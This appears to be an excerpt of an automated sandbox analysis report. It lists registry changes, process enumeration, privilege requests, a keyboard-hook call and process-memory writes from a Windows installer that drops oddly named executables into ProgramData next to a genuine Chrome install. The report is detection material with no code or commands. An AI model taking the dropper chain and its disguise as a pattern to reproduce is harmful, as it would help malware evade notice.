Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ChromeHTML\Application\ApplicationCompany = "Google LLC" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\NumMethods\ = "10" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}\PROGID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\ = "IGoogleUpdate3WebSecurity" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\ = "IPolicyStatus" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ = "ICurrentState" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{9465B4B4-5216-4042-9A2C-754D3BCDC410}\ServiceParameters = "/comsvc" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\NumMethods\ = "43" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ = "IProgressWndEvents" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{82BB48E2-2057-4C07-A383-B2C2F8A0FD01} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\NumMethods\ = "24" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D656199B-93F2-4D64-AA2F-96BD3F18D40E} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\NumMethods\ = "11" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.html C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E225E692-4B47-4777-9BED-4FD7FE257F0E}\ProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.312\\psmachine.dll" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}\NumMethods\ = "5" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromeHTML\DefaultIcon C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithProgIds\ChromeHTML C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69}\ProgID\ = "GoogleUpdate.Update3COMClassService.1.0" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\ = "IAppBundle" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\ = "IAppBundle" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.ProcessLauncher\CLSID\ = "{ABC01078-F197-4B0B-ADBC-CFE684B39C82}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\NumMethods\ = "8" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\NumMethods\ = "7" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\LocalServer32 C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Smart\setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2732 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 3032 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 3032 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 3032 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 3032 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 3032 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 1628 wrote to memory of 596 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 3032 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
